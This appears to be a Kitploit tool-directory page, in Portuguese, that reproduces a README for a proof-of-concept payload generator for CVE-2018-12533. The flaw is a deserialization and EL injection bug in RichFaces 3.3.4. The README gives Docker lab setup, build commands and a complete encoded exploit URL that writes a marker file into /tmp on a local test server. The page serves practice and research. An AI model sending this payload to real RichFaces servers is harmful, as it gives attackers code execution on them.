Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-12533 — RF-14310 / CVE-2018-12533 - Payload generator | Kitploit
Ferramentas/GitHubGitHub/llamaonsecurity/cve-2018-12533
Vulnerability AnalysisExploitationWeb Application ExploitationPapers & ResearchPayload DevelopmentLabs & Practice
GitHubllamaonsecurity/cve-2018-12533

CVE-2018-12533

RF-14310 / CVE-2018-12533 - Payload generator

Ver Repositório
911há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Gerador de payload RF-14310 / CVE-2018-12533

Baseado na pesquisa de Lucifaer

Todos os créditos vão para https://github.com/Lucifaer

Referências

https://access.redhat.com/security/cve/cve-2018-12533

richfaces-jboss-poc

Prova de conceito fácil de implantar para praticar a exploração de desserialização e injeção de EL no Richfaces 3.3.4, sem precisar se preocupar muito com versões antigas do Java etc.

Implantar Docker do jboss

Para poupar você de um pouco de trabalho ao configurar um aplicativo vulnerável, criei um Dockerfile com base nas instruções do artigo da seclist que explica a CVE-2018-14667. Basta executar os seguintes comandos no diretório raiz do repositório:

root@kitploit:~
docker build -t richfaces-jboss .
docker run -p 8081:8080 richfaces-jboss

Se tudo funcionar, você pode acessar o aplicativo de teste photoalbum do richfaces em http://127.0.0.1:8081/photoalbum

Compilar o POC do diretório raiz do repositório em um fat jar (fácil com docker e pom funcional)

root@kitploit:~
cd CVE-2018-12533
docker run -v ~/.m2:/root/.m2 -v $(pwd):/usr/src/app maven:3.5-jdk-8 mvn -f /usr/src/app/pom.xml clean package install

Gerar a URL do POC

root@kitploit:~
java -jar target/cve_2018_12533.jar 

Acessar a URL no servidor jboss

altere a seção /DATA/XXXXX para o seu payload se quiser fazer algo diferente de criar um arquivo em /tmp. Este payload cria /tmp/hacked.txt http://127.0.0.1:8081/photoalbum/a4j/s/3_3_3.Finalorg.richfaces.renderkit.html.Paint2DResource/DATA/eAHNUk1r1UAUnfegVq2L-oEiItQo-goyKSJu6gOxFX2QWukTwbp4zEtuk2knM-nkpo0W3Qmi4satIOJKUBD9Be6k4KY!QQRxIYggLvVOUlssuDebXGbOnHPuufflVzaQW3bG2JhbGSZzIoScW9AR2AWJPMFU8StCajw1OQO5KWwIxzqpiGFSoGi!X!s4!OvF6yYb7LDtvX48YZSxHTbYmzM2FeiqBGScULWttywjTGbZjlCECYi-goAN9CKiQbYnmBdLwldCx!50fx5CHA!oReaEF9kd1igzVn9N-pWMNU6yjHwfd89KXrsOTZoZDRp5lzjhklHURFcsgb2--rb9-MmHqSZrBqSvRJ5fFin8rdtFK3VMujtzehNVHMj2186k8btgpVDylnM-XmZO!gRJ8rzQlQEFmHNQPIBYhDenABMTnZc6ItJ1740mawSskSI7VLGWPii!Bl4oMwt5Lo0m6n8xXxXxVvQf5l2UimUH6zjIxFbcG3!1waefpx9RfITbu4Hb1H1-9373--zaWYdwDo64lZjvm7xqaitfJ81U!9uBH0Pvdk85bTekoeWH7N7RFQuLBeTIY8AJl3RrdKMMjKCR0IGior70nBXuBs9nCo0yBa!C14Itj1g2z6VeMgvQ0oVSoxxKCFsemiJMRnxMMz8R4QJEHEv0Rm8zVlCfN6qca!r1-b5au!b5y-GVi1WfFF8T2b7KgzR8usCsQAKCoCENb1qrdzLLyuVn7OnIubGTYyNtLyQYwoTRSDvX!l8a98rfWVxP3w__.jsf

Entrar em um shell em um terminal separado para analisar o sucesso do payload

root@kitploit:~
docker ps
docker exec -it <containerid> bash
ls /tmp

Ao usar o exploit sem modificações, ele criará /tmp/cve_2018_12533. Dessa forma, você pode confirmar se o exploit funcionou.

Baixar ferramenta